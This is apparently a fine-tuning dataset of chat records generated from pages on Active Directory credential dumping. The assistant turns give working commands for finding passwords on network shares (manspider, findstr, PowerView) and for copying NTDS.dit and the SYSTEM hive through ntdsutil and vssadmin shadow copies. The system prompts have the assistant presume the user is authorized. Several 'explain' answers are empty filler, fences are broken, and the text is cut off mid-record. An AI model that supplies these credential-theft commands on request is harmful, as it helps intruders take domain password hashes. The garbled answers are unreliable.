$IP_RANGE/$MASK -d $DOMAIN -u $USER -p $PASSWORD --content \"set sqlplus\" \"password =\"\n`\n\nManually, shares can be mounted and grepped for interesting information.\n\n=== Windows\n\nFrom Windows systems, the following commands should help find interesting information across local files and network shares.\n\n`bash\nfindstr /snip password .xml .ini *.txt\nfindstr /snip password *\n`\n\nPowerSploit's PowerView (Powershell) module can be used to find interesting files as well.\n\n`bash\nFind-InterestingFile -LastAccessTime (Get-Date).AddDays(-7)\nFind-InterestingFile -Include \"private,confidential\"\nFind-InterestingFile -Path \"\\\\$SERVER\\$Share\" -OfficeDocs\n`\n\nLast but not least, one of the best tools to find sensitive information across a number of shares and local files is Snaffler (C#).\n\n``bash", "metadata": {"corpus_index": 331, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/network-shares.md", "page_title": "Network shares", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Network shares - Practice?"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the manspider (Python) tool can be used to find sensitive information across a number of shares.\n\n``bash\nmanspider.py --threads 50 $IP_RANGE/$MASK -d $DOMAIN -u $USER -p $PASSWORD --content \"set sqlplus\" \"password =\"\n`\n\nManually, shares can be mounted and grepped for interesting information.\n\n=== Windows\n\nFrom Windows systems, the following commands should help find interesting information across local files and network shares.\n\n`bash\nfindstr /snip password .xml .ini *.txt\nfindstr /snip password *\n`\n\nPowerSploit's PowerView (Powershell) module can be used to find interesting files as well.\n\n`bash\nFind-InterestingFile -LastAccessTime (Get-Date).AddDays(-7)\nFind-InterestingFile -Include \"private,confidential\"\nFind-InterestingFile -Path \"\\\\$SERVER\\$Share\" -OfficeDocs\n`\n\nLast but not least, one of the best tools to find sensitive information across a number of shares and local files is Snaffler (C#).\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Network shares - Practice?", "response": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the manspider (Python) tool can be used to find sensitive information across a number of shares.\n\n``bash\nmanspider.py --threads 50 $IP_RANGE/$MASK -d $DOMAIN -u $USER -p $PASSWORD --content \"set sqlplus\" \"password =\"\n`\n\nManually, shares can be mounted and grepped for interesting information.\n\n=== Windows\n\nFrom Windows systems, the following commands should help find interesting information across local files and network shares.\n\n`bash\nfindstr /snip password .xml .ini *.txt\nfindstr /snip password *\n`\n\nPowerSploit's PowerView (Powershell) module can be used to find interesting files as well.\n\n`bash\nFind-InterestingFile -LastAccessTime (Get-Date).AddDays(-7)\nFind-InterestingFile -Include \"private,confidential\"\nFind-InterestingFile -Path \"\\\\$SERVER\\$Share\" -OfficeDocs\n`\n\nLast but not least, one of the best tools to find sensitive information across a number of shares and local files is Snaffler (C#).\n\n``bash", "metadata": {"corpus_index": 331, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/network-shares.md", "page_title": "Network shares", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the manspider.py syntax for network shares - practice?"}, {"role": "assistant", "content": "manspider.py --threads 50 $IP_RANGE/$MASK -d $DOMAIN -u $USER -p $PASSWORD --content \"set sqlplus\" \"password =\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the manspider.py syntax for network shares - practice?", "response": "manspider.py --threads 50 $IP_RANGE/$MASK -d $DOMAIN -u $USER -p $PASSWORD --content \"set sqlplus\" \"password =\"", "metadata": {"corpus_index": 332, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/network-shares.md", "page_title": "Network shares", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "manspider.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Network shares - Practice"}, {"role": "assistant", "content": "manspider.py --threads 50 $IP_RANGE/$MASK -d $DOMAIN -u $USER -p $PASSWORD --content \"set sqlplus\" \"password =\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Network shares - Practice", "response": "manspider.py --threads 50 $IP_RANGE/$MASK -d $DOMAIN -u $USER -p $PASSWORD --content \"set sqlplus\" \"password =\"", "metadata": {"corpus_index": 332, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/network-shares.md", "page_title": "Network shares", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `manspider.py --threads 50 $IP_RANGE/$MASK -d $DOMAIN -u $USER -p $PASSWORD --content \"set sqlplus\" \"password =\"`?"}, {"role": "assistant", "content": "This command is used for network shares - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `manspider.py --threads 50 $IP_RANGE/$MASK -d $DOMAIN -u $USER -p $PASSWORD --content \"set sqlplus\" \"password =\"`?", "response": "This command is used for network shares - practice. Practice", "metadata": {"corpus_index": 332, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/network-shares.md", "page_title": "Network shares", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the findstr command to network shares - practice"}, {"role": "assistant", "content": "findstr /snip password *.xml *.ini *.txt\nfindstr /snip password *"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the findstr command to network shares - practice", "response": "findstr /snip password *.xml *.ini *.txt\nfindstr /snip password *", "metadata": {"corpus_index": 333, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/network-shares.md", "page_title": "Network shares", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "findstr"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Network shares - Practice?"}, {"role": "assistant", "content": "findstr /snip password *.xml *.ini *.txt\nfindstr /snip password *"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Network shares - Practice?", "response": "findstr /snip password *.xml *.ini *.txt\nfindstr /snip password *", "metadata": {"corpus_index": 333, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/network-shares.md", "page_title": "Network shares", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `findstr /snip password *.xml *.ini *.txt`?"}, {"role": "assistant", "content": "This command is used for network shares - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `findstr /snip password *.xml *.ini *.txt`?", "response": "This command is used for network shares - practice. Practice", "metadata": {"corpus_index": 333, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/network-shares.md", "page_title": "Network shares", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use Find-InterestingFile for network shares - practice?"}, {"role": "assistant", "content": "Find-InterestingFile -LastAccessTime (Get-Date).AddDays(-7)\nFind-InterestingFile -Include \"private,confidential\"\nFind-InterestingFile -Path \"\\\\$SERVER\\$Share\" -OfficeDocs"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use Find-InterestingFile for network shares - practice?", "response": "Find-InterestingFile -LastAccessTime (Get-Date).AddDays(-7)\nFind-InterestingFile -Include \"private,confidential\"\nFind-InterestingFile -Path \"\\\\$SERVER\\$Share\" -OfficeDocs", "metadata": {"corpus_index": 334, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/network-shares.md", "page_title": "Network shares", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Find-InterestingFile"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Network shares - Practice?"}, {"role": "assistant", "content": "Find-InterestingFile -LastAccessTime (Get-Date).AddDays(-7)\nFind-InterestingFile -Include \"private,confidential\"\nFind-InterestingFile -Path \"\\\\$SERVER\\$Share\" -OfficeDocs"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Network shares - Practice?", "response": "Find-InterestingFile -LastAccessTime (Get-Date).AddDays(-7)\nFind-InterestingFile -Include \"private,confidential\"\nFind-InterestingFile -Path \"\\\\$SERVER\\$Share\" -OfficeDocs", "metadata": {"corpus_index": 334, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/network-shares.md", "page_title": "Network shares", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Find-InterestingFile -LastAccessTime (Get-Date).AddDays(-7)`?"}, {"role": "assistant", "content": "This command is used for network shares - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Find-InterestingFile -LastAccessTime (Get-Date).AddDays(-7)`?", "response": "This command is used for network shares - practice. Practice", "metadata": {"corpus_index": 334, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/network-shares.md", "page_title": "Network shares", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Network shares - Resource?"}, {"role": "assistant", "content": "https://github.com/SnaffCon/Snaffler\n\nhttps://github.com/blacklanternsecurity/MANSPIDER"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Network shares - Resource?", "response": "https://github.com/SnaffCon/Snaffler\n\nhttps://github.com/blacklanternsecurity/MANSPIDER", "metadata": {"corpus_index": 335, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/network-shares.md", "page_title": "Network shares", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Network shares - Resource"}, {"role": "assistant", "content": "https://github.com/SnaffCon/Snaffler\n\nhttps://github.com/blacklanternsecurity/MANSPIDER"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Network shares - Resource", "response": "https://github.com/SnaffCon/Snaffler\n\nhttps://github.com/blacklanternsecurity/MANSPIDER", "metadata": {"corpus_index": 335, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/network-shares.md", "page_title": "Network shares", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of NTDS secrets"}, {"role": "assistant", "content": "NTDS (Windows NT Directory Services) is the directory services used by Microsoft Windows NT to locate, manage, and organize network resources. The NTDS.dit file is a database that stores the Active Directory data (including users, groups, security descriptors and password hashes). This file is stored on the domain controllers.\n\nOnce the secrets are extracted, they can be used for various attacks: credential spraying, stuffing, shuffling, cracking, pass-the-hash, overpass-the-hash or silver or golden tickets."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of NTDS secrets", "response": "NTDS (Windows NT Directory Services) is the directory services used by Microsoft Windows NT to locate, manage, and organize network resources. The NTDS.dit file is a database that stores the Active Directory data (including users, groups, security descriptors and password hashes). This file is stored on the domain controllers.\n\nOnce the secrets are extracted, they can be used for various attacks: credential spraying, stuffing, shuffling, cracking, pass-the-hash, overpass-the-hash or silver or golden tickets.", "metadata": {"corpus_index": 336, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through NTDS secrets"}, {"role": "assistant", "content": "NTDS (Windows NT Directory Services) is the directory services used by Microsoft Windows NT to locate, manage, and organize network resources. The NTDS.dit file is a database that stores the Active Directory data (including users, groups, security descriptors and password hashes). This file is stored on the domain controllers.\n\nOnce the secrets are extracted, they can be used for various attacks: credential spraying, stuffing, shuffling, cracking, pass-the-hash, overpass-the-hash or silver or golden tickets."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through NTDS secrets", "response": "NTDS (Windows NT Directory Services) is the directory services used by Microsoft Windows NT to locate, manage, and organize network resources. The NTDS.dit file is a database that stores the Active Directory data (including users, groups, security descriptors and password hashes). This file is stored on the domain controllers.\n\nOnce the secrets are extracted, they can be used for various attacks: credential spraying, stuffing, shuffling, cracking, pass-the-hash, overpass-the-hash or silver or golden tickets.", "metadata": {"corpus_index": 336, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of NTDS secrets - 1. Exfiltration"}, {"role": "assistant", "content": "Since the NTDS.dit is constantly used by AD processes such as the Kerberos KDC, it can't be copied like any other file. In order to exfiltrate it from a live domain controller and extract password hashes from it, many techniques can be used.\n\nJust like with SAM & LSA secrets, the SYSTEM registry hive contains enough info to decrypt the NTDS.dit data. The hive file (\\system32\\config\\system) can either be exfiltrated the same way the NTDS.dit file is, or it can be exported with reg save HKLM\\SYSTEM 'C:\\Windows\\Temp\\system.save'."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of NTDS secrets - 1. Exfiltration", "response": "Since the NTDS.dit is constantly used by AD processes such as the Kerberos KDC, it can't be copied like any other file. In order to exfiltrate it from a live domain controller and extract password hashes from it, many techniques can be used.\n\nJust like with SAM & LSA secrets, the SYSTEM registry hive contains enough info to decrypt the NTDS.dit data. The hive file (\\system32\\config\\system) can either be exfiltrated the same way the NTDS.dit file is, or it can be exported with reg save HKLM\\SYSTEM 'C:\\Windows\\Temp\\system.save'.", "metadata": {"corpus_index": 337, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform NTDS secrets - 1. Exfiltration?"}, {"role": "assistant", "content": "Since the NTDS.dit is constantly used by AD processes such as the Kerberos KDC, it can't be copied like any other file. In order to exfiltrate it from a live domain controller and extract password hashes from it, many techniques can be used.\n\nJust like with SAM & LSA secrets, the SYSTEM registry hive contains enough info to decrypt the NTDS.dit data. The hive file (\\system32\\config\\system) can either be exfiltrated the same way the NTDS.dit file is, or it can be exported with reg save HKLM\\SYSTEM 'C:\\Windows\\Temp\\system.save'."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform NTDS secrets - 1. Exfiltration?", "response": "Since the NTDS.dit is constantly used by AD processes such as the Kerberos KDC, it can't be copied like any other file. In order to exfiltrate it from a live domain controller and extract password hashes from it, many techniques can be used.\n\nJust like with SAM & LSA secrets, the SYSTEM registry hive contains enough info to decrypt the NTDS.dit data. The hive file (\\system32\\config\\system) can either be exfiltrated the same way the NTDS.dit file is, or it can be exported with reg save HKLM\\SYSTEM 'C:\\Windows\\Temp\\system.save'.", "metadata": {"corpus_index": 337, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does NTDS secrets - AD maintenance (NTDSUtil) work?"}, {"role": "assistant", "content": "NTDSUtil.exe is a diagnostic tool available as part of Active Directory. It has the ability to save a snapshot of the Active Directory data. Running the following command will copy the NTDS.dit database and the SYSTEM and SECURITY hives to C:\\Windows\\Temp.\n\n``bash\nntdsutil \"activate instance ntds\" \"ifm\" \"create full C:\\Windows\\Temp\\NTDS\" quit quit\n`\n\nThe following files can then be exported\n\n* C:\\Windows\\Temp\\NTDS\\Active Directory\\ntds.dit\n* C:\\Windows\\Temp\\NTDS\\registry\\SYSTEM`\n\n> [!WARNING]\n> If the NTDS database is very large (several gigabytes), the generation of a defragmented backup with ntdsutil consumes a lot of CPU and disk resources on the server, which can cause slowdowns and other undesirable effects on the domain controller."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does NTDS secrets - AD maintenance (NTDSUtil) work?", "response": "NTDSUtil.exe is a diagnostic tool available as part of Active Directory. It has the ability to save a snapshot of the Active Directory data. Running the following command will copy the NTDS.dit database and the SYSTEM and SECURITY hives to C:\\Windows\\Temp.\n\n``bash\nntdsutil \"activate instance ntds\" \"ifm\" \"create full C:\\Windows\\Temp\\NTDS\" quit quit\n`\n\nThe following files can then be exported\n\n* C:\\Windows\\Temp\\NTDS\\Active Directory\\ntds.dit\n* C:\\Windows\\Temp\\NTDS\\registry\\SYSTEM`\n\n> [!WARNING]\n> If the NTDS database is very large (several gigabytes), the generation of a defragmented backup with ntdsutil consumes a lot of CPU and disk resources on the server, which can cause slowdowns and other undesirable effects on the domain controller.", "metadata": {"corpus_index": 338, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on NTDS secrets - AD maintenance (NTDSUtil)"}, {"role": "assistant", "content": "NTDSUtil.exe is a diagnostic tool available as part of Active Directory. It has the ability to save a snapshot of the Active Directory data. Running the following command will copy the NTDS.dit database and the SYSTEM and SECURITY hives to C:\\Windows\\Temp.\n\n``bash\nntdsutil \"activate instance ntds\" \"ifm\" \"create full C:\\Windows\\Temp\\NTDS\" quit quit\n`\n\nThe following files can then be exported\n\n* C:\\Windows\\Temp\\NTDS\\Active Directory\\ntds.dit\n* C:\\Windows\\Temp\\NTDS\\registry\\SYSTEM`\n\n> [!WARNING]\n> If the NTDS database is very large (several gigabytes), the generation of a defragmented backup with ntdsutil consumes a lot of CPU and disk resources on the server, which can cause slowdowns and other undesirable effects on the domain controller."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on NTDS secrets - AD maintenance (NTDSUtil)", "response": "NTDSUtil.exe is a diagnostic tool available as part of Active Directory. It has the ability to save a snapshot of the Active Directory data. Running the following command will copy the NTDS.dit database and the SYSTEM and SECURITY hives to C:\\Windows\\Temp.\n\n``bash\nntdsutil \"activate instance ntds\" \"ifm\" \"create full C:\\Windows\\Temp\\NTDS\" quit quit\n`\n\nThe following files can then be exported\n\n* C:\\Windows\\Temp\\NTDS\\Active Directory\\ntds.dit\n* C:\\Windows\\Temp\\NTDS\\registry\\SYSTEM`\n\n> [!WARNING]\n> If the NTDS database is very large (several gigabytes), the generation of a defragmented backup with ntdsutil consumes a lot of CPU and disk resources on the server, which can cause slowdowns and other undesirable effects on the domain controller.", "metadata": {"corpus_index": 338, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the ntdsutil syntax for ntds secrets - ad maintenance (ntdsutil)?"}, {"role": "assistant", "content": "ntdsutil \"activate instance ntds\" \"ifm\" \"create full C:\\Windows\\Temp\\NTDS\" quit quit"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the ntdsutil syntax for ntds secrets - ad maintenance (ntdsutil)?", "response": "ntdsutil \"activate instance ntds\" \"ifm\" \"create full C:\\Windows\\Temp\\NTDS\" quit quit", "metadata": {"corpus_index": 339, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "ntdsutil"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through NTDS secrets - AD maintenance (NTDSUtil)"}, {"role": "assistant", "content": "ntdsutil \"activate instance ntds\" \"ifm\" \"create full C:\\Windows\\Temp\\NTDS\" quit quit"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through NTDS secrets - AD maintenance (NTDSUtil)", "response": "ntdsutil \"activate instance ntds\" \"ifm\" \"create full C:\\Windows\\Temp\\NTDS\" quit quit", "metadata": {"corpus_index": 339, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `ntdsutil \"activate instance ntds\" \"ifm\" \"create full C:\\Windows\\Temp\\NTDS\" quit quit`?"}, {"role": "assistant", "content": "This command is used for ntds secrets - ad maintenance (ntdsutil). AD maintenance (NTDSUtil)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `ntdsutil \"activate instance ntds\" \"ifm\" \"create full C:\\Windows\\Temp\\NTDS\" quit quit`?", "response": "This command is used for ntds secrets - ad maintenance (ntdsutil). AD maintenance (NTDSUtil)", "metadata": {"corpus_index": 339, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about NTDS secrets - Volume Shadow Copy (VSSAdmin)?"}, {"role": "assistant", "content": "VSS (Volume Shadow Copy) is a Microsoft Windows technology, implemented as a service, that allows the creation of backup copies of files or volumes, even when they are in use. The following command will create the shadow copy and will print two values that will be used later: the ID and the Name of the shadow copy.\n\n``bash\nvssadmin create shadow /for=C:\n`\n\nOnce the VSS is created for the target drive, it is then possible to copy the target files from it.\n\n`bash\ncopy $ShadowCopyName\\Windows\\NTDS\\NTDS.dit C:\\Windows\\Temp\\ntds.dit.save\ncopy $ShadowCopyName\\Windows\\System32\\config\\SYSTEM C:\\Windows\\Temp\\system.save\n`\n\nOnce the required files are exfiltrated, the shadow copy can be removed\n\n`bash\nvssadmin delete shadows /shadow=$ShadowCopyId\n`\n\n> [!TIP]\n> This attack can be carried out with Impacket's secretsdump with the -use-vss option. Additionaly, the -exec-method option can be set to smbexec, wmiexec or mmcexec` to specify on which remote command execution method to rely on for the process."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about NTDS secrets - Volume Shadow Copy (VSSAdmin)?", "response": "VSS (Volume Shadow Copy) is a Microsoft Windows technology, implemented as a service, that allows the creation of backup copies of files or volumes, even when they are in use. The following command will create the shadow copy and will print two values that will be used later: the ID and the Name of the shadow copy.\n\n``bash\nvssadmin create shadow /for=C:\n`\n\nOnce the VSS is created for the target drive, it is then possible to copy the target files from it.\n\n`bash\ncopy $ShadowCopyName\\Windows\\NTDS\\NTDS.dit C:\\Windows\\Temp\\ntds.dit.save\ncopy $ShadowCopyName\\Windows\\System32\\config\\SYSTEM C:\\Windows\\Temp\\system.save\n`\n\nOnce the required files are exfiltrated, the shadow copy can be removed\n\n`bash\nvssadmin delete shadows /shadow=$ShadowCopyId\n`\n\n> [!TIP]\n> This attack can be carried out with Impacket's secretsdump with the -use-vss option. Additionaly, the -exec-method option can be set to smbexec, wmiexec or mmcexec` to specify on which remote command execution method to rely on for the process.", "metadata": {"corpus_index": 340, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for NTDS secrets - Volume Shadow Copy (VSSAdmin)"}, {"role": "assistant", "content": "VSS (Volume Shadow Copy) is a Microsoft Windows technology, implemented as a service, that allows the creation of backup copies of files or volumes, even when they are in use. The following command will create the shadow copy and will print two values that will be used later: the ID and the Name of the shadow copy.\n\n``bash\nvssadmin create shadow /for=C:\n`\n\nOnce the VSS is created for the target drive, it is then possible to copy the target files from it.\n\n`bash\ncopy $ShadowCopyName\\Windows\\NTDS\\NTDS.dit C:\\Windows\\Temp\\ntds.dit.save\ncopy $ShadowCopyName\\Windows\\System32\\config\\SYSTEM C:\\Windows\\Temp\\system.save\n`\n\nOnce the required files are exfiltrated, the shadow copy can be removed\n\n`bash\nvssadmin delete shadows /shadow=$ShadowCopyId\n`\n\n> [!TIP]\n> This attack can be carried out with Impacket's secretsdump with the -use-vss option. Additionaly, the -exec-method option can be set to smbexec, wmiexec or mmcexec` to specify on which remote command execution method to rely on for the process."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for NTDS secrets - Volume Shadow Copy (VSSAdmin)", "response": "VSS (Volume Shadow Copy) is a Microsoft Windows technology, implemented as a service, that allows the creation 